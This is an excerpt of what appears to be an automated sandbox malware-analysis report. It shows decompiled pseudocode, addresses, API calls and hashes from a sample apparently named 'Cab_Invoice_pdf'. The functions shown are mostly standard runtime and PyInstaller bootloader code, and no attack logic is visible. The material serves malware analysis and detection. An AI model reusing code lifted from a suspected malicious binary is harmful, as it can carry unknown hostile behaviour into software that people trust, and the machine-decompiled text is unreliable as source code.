								}
								_t67 = _v16 + _t132 & 0x0000ffff;
								_v20 = _t67;
								_t102 =  *(0x6e3552e0 + _t67 * 4);
								if(_t102 == 0) {
									goto L33;
								} else {
									while(1) {
										_t68 = E6E2F3C90(_t102, _a4, _t102, _t128, _t132, _t128, _a12);
										_t143 = _t143 + 8;
										if(_t68 != 0) {
											break;
										}
										_t132 = _t132 + _t132;
										if(_t132 > 0xffff) {
											_t132 = _t132 ^ 0x0001002d;
										}
										_t75 = _v20 + _t132 & 0x0000ffff;
										_v20 = _t75;
										_t102 =  *(0x6e3552e0 + _t75 * 4);
										if(_t102 != 0) {
											continue;
										} else {
											goto L33;
										}
										goto L39;
									}
									if(_a20 != 0 || _t102 - 0xf0200 > 0x1b9) {
										if(_t102 - 0xf0000 <= 0x1d3) {
											_t102 =  *(0x6dfd7928 + _t102 * 4);
										}
										 *_a16 = _t102;
										return 1;
									} else {
										goto L33;
									}
								}
							} else {
								return E6E2F3DC0(_v20, _a16, _a20);
							}
						}
					} else {
						_t109 = 0;
						_t136 = _a12 - 0x16;
						_t129 =  &(_t128[0x16]);
						if(_t136 == 4 || _t136 == 5) {
							if(_t136 == 0) {
								L15:
								if(E6E2F3970(_t109) == 0) {
									goto L33;
								} else {
									 *_a16 = _t109;
									return 1;
								}
							} else {
								do {
									_t123 =  *_t129;
									_t136 = _t136 - 1;
									_t110 = _t109 << 4;
									if(_t123 - 0x30 > 9) {
										if(_t123 - 0x41 > 5) {
											goto L33;
										} else {
											_t111 = _t110 + 0xffffffc9;
											goto L14;
										}
									} else {
										_t111 = _t110 + 0xffffffd0;
										goto L14;
									}
									goto L39;
									L14:
									_t129 =  &(_t129[1]);
									_t109 = _t111 + _t123;
								} while (_t136 != 0);
								goto L15;
							}
						} else {
							goto L33;
						}
					}
				} else {
					_v12 = 0xffffffff;
					_t137 =  &(_t128[0x10]);
					_v16 = 0xffffffff;
					_v20 = 0xffffffff;
					E6E2F3D40(_t137,  &_v8,  &_v12, 0x13, _t54);
					_t138 =  &(_t137[_v8]);
					E6E2F3D40(_t138,  &_v8,  &_v16, 0x15, 1);
					_t139 =  &(_t138[_v8]);
					E6E2F3D40(_t139,  &_v8,  &_v20, 0x1c, 2);
					_t115 = _v12;
					if(_t115 == 0xffffffff) {
						L33:
						return 0;
					} else {
						_t127 = _v16;
						if(_t127 == 0xffffffff) {
							goto L33;
						} else {
							_t103 = _v20;
							if(_t103 == 0xffffffff || _v8 - _t128 + _t139 != _a12) {
								goto L33;
							} else {
								 *_a16 = _t103 + ((_t115 * 0x15 + _t127) * 8 - _t115 * 0x15 + _t127 + 0x2b00) * 4;
								return 1;
							}
						}
					}
				}
				L39:
			}









































                            0x6e2f3e0f
                            0x6e2f3e1a
                            0x6e2f3e1c
                            0x6e2f3e21
                            0x6e2f3ee0
                            0x6e2f3ee2
                            0x6e2f3ee7
                            0x6e2f3f4e
                            0x6e2f3f51
                            0x6e2f3f53
                            0x6e2f3f57
                            0x6e2f3f60
                            0x6e2f3f71
                            0x6e2f3f75
                            0x6e2f3f7a
                            0x6e2f3f81
                            0x6e2f3f81
                            0x6e2f3f87
                            0x6e2f3f88
                            0x6e2f3f60
                            0x6e2f3f90
                            0x6e2f3f93
                            0x6e2f3f96
                            0x6e2f3f9d
                            0x6e2f3fa2
                            0x00000000
                            0x6e2f3fa8
                            0x6e2f3faf
                            0x6e2f3fb4
                            0x6e2f3fb9
                            0x6e2f3fda
                            0x6e2f3fdf
                            0x6e2f3fe1
                            0x6e2f3fe1
                            0x6e2f3feb
                            0x6e2f3fee
                            0x6e2f3ff1
                            0x6e2f3ffa
                            0x00000000
                            0x6e2f4000
                            0x6e2f4000
                            0x6e2f4009
                            0x6e2f400e
                            0x6e2f4013
                            0x00000000
                            0x00000000
                            0x6e2f4015
                            0x6e2f401d
                            0x6e2f401f
                            0x6e2f401f
                            0x6e2f402a
                            0x6e2f402d
                            0x6e2f4030
                            0x6e2f4039
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x6e2f4039
                            0x6e2f4048
                            0x6e2f4062
                            0x6e2f4064
                            0x6e2f4064
                            0x6e2f4070
                            0x6e2f407b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x6e2f4048
                            0x6e2f3fbb
                            0x6e2f3fd2
                            0x6e2f3fd2
                            0x6e2f3fb9
                            0x6e2f3ee9
                            0x6e2f3eec
                            0x6e2f3eee
                            0x6e2f3ef1
                            0x6e2f3ef7
                            0x6e2f3f04
                            0x6e2f3f30
                            0x6e2f3f37
                            0x00000000
                            0x6e2f3f3d
                            0x6e2f3f43
                            0x6e2f3f4d
                            0x6e2f3f4d
                            0x6e2f3f06
                            0x6e2f3f06
                            0x6e2f3f06
                            0x6e2f3f08
                            0x6e2f3f09
                            0x6e2f3f11
                            0x6e2f3f1d
                            0x00000000
                            0x6e2f3f23
                            0x6e2f3f23
                            0x00000000
                            0x6e2f3f23
                            0x6e2f3f13
                            0x6e2f3f13
                            0x00000000
                            0x6e2f3f13
                            0x00000000
                            0x6e2f3f26
                            0x6e2f3f29
                            0x6e2f3f2a
                            0x6e2f3f2c
                            0x00000000
                            0x6e2f3f06
                            0x00000000
                            0x00000000
                            0x00000000
                            0x6e2f3ef7
                            0x6e2f3e27
                            0x6e2f3e2b
                            0x6e2f3e32
                            0x6e2f3e35
                            0x6e2f3e42
                            0x6e2f3e4b
                            0x6e2f3e50
                            0x6e2f3e60
                            0x6e2f3e65
                            0x6e2f3e75
                            0x6e2f3e7a
                            0x6e2f3e83
                            0x6e2f403d
                            0x6e2f4043
                            0x6e2f3e89
                            0x6e2f3e89
                            0x6e2f3e8f
                            0x00000000
                            0x6e2f3e95
                            0x6e2f3e95
                            0x6e2f3e9b
                            0x00000000
                            0x6e2f3eb1
                            0x6e2f3ecd
                            0x6e2f3ed7
                            0x6e2f3ed7
                            0x6e2f3e9b
                            0x6e2f3e8f
                            0x6e2f3e83
                            0x00000000

                            APIs
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,HANGUL SYLLABLE ,00000010,?,?,?,?,?,00000001), ref: 6E2F3E1A
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CJK UNIFIED IDEOGRAPH-,00000016,?,?,?,?,?,00000001), ref: 6E2F3EE0
                              • Part of subcall function 6E2F3D40: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000013,?,?,?,?,?,00000013,00000000), ref: 6E2F3D82
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: strncmp
                            • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                            • API String ID: 1114863663-87138338
                            • Opcode ID: df044ab06aeb556ab101745bd65bfc54eb6a0d6771bfe9c55cc1d870bd308f97
                            • Instruction ID: f163d63416b3d4ca9700d0d20e2046f39c58553db3fdf30f7448520f68e52671
                            • Opcode Fuzzy Hash: df044ab06aeb556ab101745bd65bfc54eb6a0d6771bfe9c55cc1d870bd308f97
                            • Instruction Fuzzy Hash: 5F71F432A4012E8BDB04CE98DD947FEF3B6BB04329F00026AE965D7381E7719D138791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132CE51, Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E0132CE51(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E01322807(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E01322807(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t20 = _a12;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t21 = E01322807(_t59, _v20, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(E0131C9CE()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t25 = E01322807(_t59, _a8, _a12, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(E0131E926(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(E0131C9CE())) = 0xd;
							_t30 = E0131C9BB();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E01320B10(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E0131D960(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = E0132308B(_t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E0131C9BB();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(E0131C9CE())) = 0xd;
										}
										L23:
										_t38 = E0131C9CE();
										E013209EB(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E0131D960(_t56, _t59, _v12);
							E013209EB(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(E0131C9CE())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(E0131C9CE()));
			}





























                            0x0132ce51
                            0x0132ce5b
                            0x0132ce5e
                            0x0132ce65
                            0x0132ce6c
                            0x0132ce71
                            0x0132ce74
                            0x0132ce7a
                            0x0132ce8d
                            0x0132ce94
                            0x0132ce97
                            0x0132ce99
                            0x0132ce9c
                            0x00000000
                            0x00000000
                            0x0132cea2
                            0x0132cea2
                            0x0132cea4
                            0x0132cea7
                            0x0132cea9
                            0x0132ceac
                            0x0132cf8a
                            0x0132cf8a
                            0x0132cf8c
                            0x0132cf43
                            0x0132cf4b
                            0x0132cf55
                            0x0132cf58
                            0x0132cfd9
                            0x0132cfd9
                            0x0132cfdb
                            0x00000000
                            0x0132cfdb
                            0x0132cf5a
                            0x0132cf5f
                            0x00000000
                            0x0132cf5f
                            0x0132cf8e
                            0x0132cf94
                            0x0132cf9c
                            0x0132cfa3
                            0x0132cfa6
                            0x0132cfa9
                            0x00000000
                            0x00000000
                            0x0132cfb3
                            0x0132cfb9
                            0x0132cfbb
                            0x00000000
                            0x00000000
                            0x0132cfc2
                            0x0132cfc8
                            0x0132cfd5
                            0x00000000
                            0x0132cfd5
                            0x0132cf90
                            0x0132cf92
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132cf92
                            0x0132ceb2
                            0x0132cebc
                            0x0132cec8
                            0x0132cecb
                            0x0132cecc
                            0x0132cece
                            0x0132ceec
                            0x0132ceef
                            0x0132cef2
                            0x0132cef3
                            0x0132cef3
                            0x0132cef5
                            0x0132cf08
                            0x0132cf08
                            0x0132cf0a
                            0x0132cf0d
                            0x0132cf12
                            0x0132cf15
                            0x0132cf18
                            0x0132cf63
                            0x0132cf68
                            0x0132cf6b
                            0x0132cf72
                            0x0132cf72
                            0x0132cf78
                            0x0132cf78
                            0x0132cf80
                            0x0132cf86
                            0x00000000
                            0x0132cf86
                            0x0132cf1a
                            0x0132cf1b
                            0x0132cf1d
                            0x0132cf20
                            0x0132cf22
                            0x0132cf25
                            0x0132cf27
                            0x0132cf01
                            0x0132cf01
                            0x00000000
                            0x0132cf01
                            0x0132cf29
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132cf29
                            0x0132cef7
                            0x00000000
                            0x00000000
                            0x0132cef9
                            0x0132ceff
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132cf2b
                            0x0132cf2b
                            0x0132cf2b
                            0x0132cf33
                            0x0132cf39
                            0x0132cf3e
                            0x0132cf41
                            0x0132cf41
                            0x00000000
                            0x0132cf41
                            0x0132ced5
                            0x00000000
                            0x0132ced5
                            0x0132ceb4
                            0x0132ceb6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132ceb6
                            0x0132ce7c
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 7a815f09b851f3af87ac9eea72cbe2fa14c60fd18fa9d42c3029e95416590607
                            • Instruction ID: 6a8371eefd091abc7d88622678c3f8378c6bd9c98afdf8dbe5d8316ba38fca1b
                            • Opcode Fuzzy Hash: 7a815f09b851f3af87ac9eea72cbe2fa14c60fd18fa9d42c3029e95416590607
                            • Instruction Fuzzy Hash: 1F414832A402367BDB357BBC8C80EBE3EA9EF1267CF141215F51DD6194D674894983A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01328041, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E01328041(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x133c008; // 0xa212446c
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E0131AFAE(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E0131786A();
					return _t67;
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E01318520(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E0132815E(_t71);
					goto L15;
				}
				asm("sbb eax, eax");
				_t47 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E01320A25(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E0132F250();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                            0x01328049
                            0x01328050
                            0x01328053
                            0x0132805c
                            0x01328061
                            0x01328066
                            0x0132806b
                            0x0132806e
                            0x01328070
                            0x01328070
                            0x01328075
                            0x0132808e
                            0x01328094
                            0x01328099
                            0x01328138
                            0x0132813c
                            0x01328141
                            0x01328141
                            0x01328155
                            0x0132815d
                            0x0132815d
                            0x0132809f
                            0x013280a7
                            0x013280ab
                            0x013280f7
                            0x013280f9
                            0x013280fb
                            0x01328100
                            0x01328117
                            0x0132811f
                            0x0132812f
                            0x0132812f
                            0x0132811f
                            0x01328131
                            0x01328132
                            0x00000000
                            0x01328137
                            0x013280b2
                            0x013280b4
                            0x013280b6
                            0x013280be
                            0x013280db
                            0x013280e5
                            0x013280ea
                            0x00000000
                            0x00000000
                            0x013280ec
                            0x013280f2
                            0x013280f2
                            0x00000000
                            0x013280f2
                            0x013280c2
                            0x013280c6
                            0x013280cb
                            0x013280cf
                            0x00000000
                            0x00000000
                            0x013280d1
                            0x00000000

                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,01323E2E,?,00000000,?,00000001,?,?,00000001,01323E2E,?), ref: 0132808E
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 01328117
                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01320C3C,?), ref: 01328129
                            • __freea.LIBCMT ref: 01328132
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                            • String ID:
                            • API String ID: 2652629310-0
                            • Opcode ID: f5e7fb08b5d7ddbabfcc46837f92d3fb1fdd42e651adc2c65bdd86b8c6efa288
                            • Instruction ID: c38cdc15ecfb4a93aad769d38e4fda7e8979d4cc34cff848d020fe9e9ec58fd9
                            • Opcode Fuzzy Hash: f5e7fb08b5d7ddbabfcc46837f92d3fb1fdd42e651adc2c65bdd86b8c6efa288
                            • Instruction Fuzzy Hash: 9B31D472A0022AABDF25AF68DC40DAF7BE5EF50714F1441A8FC04D7194EB35D951CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01323623, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 95%
                            			E01323623(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x1346318 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x13352d0 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xa212446d
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                            0x01323628
                            0x0132362c
                            0x01323633
                            0x01323637
                            0x01323645
                            0x0132365b
                            0x0132365f
                            0x01323688
                            0x0132368a
                            0x0132368e
                            0x01323691
                            0x01323691
                            0x01323697
                            0x01323699
                            0x00000000
                            0x0132369a
                            0x01323661
                            0x0132366a
                            0x01323679
                            0x0132366c
                            0x0132366f
                            0x01323675
                            0x01323675
                            0x0132367d
                            0x00000000
                            0x0132367f
                            0x01323682
                            0x01323684
                            0x00000000
                            0x01323684
                            0x0132367d
                            0x01323639
                            0x0132363e
                            0x00000000

                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0131A8EB,00000000,00000000,?,013235CA,0131A8EB,00000000,00000000,00000000,?,01323889,00000006,FlsSetValue), ref: 01323655
                            • GetLastError.KERNEL32(?,013235CA,0131A8EB,00000000,00000000,00000000,?,01323889,00000006,FlsSetValue,013357B4,013357BC,00000000,00000364,?,013244F7), ref: 01323661
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,013235CA,0131A8EB,00000000,00000000,00000000,?,01323889,00000006,FlsSetValue,013357B4,013357BC,00000000), ref: 0132366F
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: bad26df613f07dd005085c16599c29d2a0f759aa768d02eeb89bdd357df91d79
                            • Instruction ID: ef0cb0fa4b0668c1ccd00ca3549c129f1052f6e498986ee5c99aec6eca9fa040
                            • Opcode Fuzzy Hash: bad26df613f07dd005085c16599c29d2a0f759aa768d02eeb89bdd357df91d79
                            • Instruction Fuzzy Hash: 3D01D432601236ABC731596CACC4A5ABB9CFB09B75F110620F919D3240D738D8048BE8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013190D6, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E013190D6() {
				void* _t4;
				void* _t8;

				E013195F4();
				E01319588();
				if(E013192E8() != 0) {
					_t4 = E0131929A(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E01319324();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                            0x013190d6
                            0x013190db
                            0x013190e7
                            0x013190ec
                            0x013190f1
                            0x013190f3
                            0x013190fe
                            0x013190f5
                            0x013190f5
                            0x00000000
                            0x013190f5
                            0x013190e9
                            0x013190e9
                            0x013190eb
                            0x013190eb

                            APIs
                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 013190D6
                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 013190DB
                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 013190E0
                              • Part of subcall function 013192E8: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 013192F9
                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 013190F5
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                            • String ID:
                            • API String ID: 1761009282-0
                            • Opcode ID: e28c8e4002e4feb3b2185dbbe633f88e05227d084f504df5a77bd89c2bb576a4
                            • Instruction ID: f1ae8affaf00e4f12c2a455dbc1020fa86d0da459a9f17d5c8056f63a281f38a
                            • Opcode Fuzzy Hash: e28c8e4002e4feb3b2185dbbe633f88e05227d084f504df5a77bd89c2bb576a4
                            • Instruction Fuzzy Hash: 8CC0486440032BD8DD2D3ABD22B53ED23880EBB98DBC0A8C1C8A02B44E8D07006B5333
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01312450, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 207COMMON
                            Download Yara Rule
                            C-Code - Quality: 40%
                            			E01312450(void* __edx, void* __eflags, char _a4092, char _a4096, char _a8192, signed int _a12284, signed int _a12288, intOrPtr _a12292, intOrPtr _a12296, intOrPtr _a12300) {
				char _v0;
				char _v4;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t35;
				signed int _t39;
				signed int _t49;
				signed int _t52;
				signed int _t53;
				signed int _t60;
				signed int _t63;
				signed int _t64;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				void* _t76;
				signed int _t77;
				void* _t79;
				signed int _t85;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				intOrPtr _t98;
				signed int _t101;
				intOrPtr* _t102;
				intOrPtr _t104;
				signed int _t108;
				void* _t110;
				void* _t112;
				void* _t114;
				signed int _t115;
				void* _t117;
				void* _t120;

				_t120 = __eflags;
				_t90 = __edx;
				E01317880();
				_t35 =  *0x133c008; // 0xa212446c
				_a12288 = _t35 ^ _t108;
				_t104 = _a12300;
				E0131D2BE(E0131A7EB(2), 0);
				_push(0);
				_t39 = E01311770(_t120);
				_t93 = _t39;
				_t110 = _t108 + 0x10;
				if(_t93 != 0) {
					_t39 = E013127A0(__edx,  &_v0, _v0);
					_t110 = _t110 + 8;
					__eflags = _t39;
					if(_t39 == 0) {
						goto L1;
					} else {
						_t39 = E013126F0( &_a8192,  &_v0);
						_t110 = _t110 + 8;
						__eflags = _t39;
						if(__eflags == 0) {
							goto L1;
						} else {
							_t39 = L01312930(__eflags,  &_a4096,  &_v0);
							_t110 = _t110 + 8;
							__eflags = _t39;
							if(_t39 == 0) {
								goto L1;
							} else {
								_push(_t76);
								_push("_MEIPASS2");
								_t77 = E01313E40(_t76, _t93);
								E013143D0("_MEIPASS2");
								_t49 = E01311690(_t104, _t93,  &_v0);
								_t112 = _t110 + 0x10;
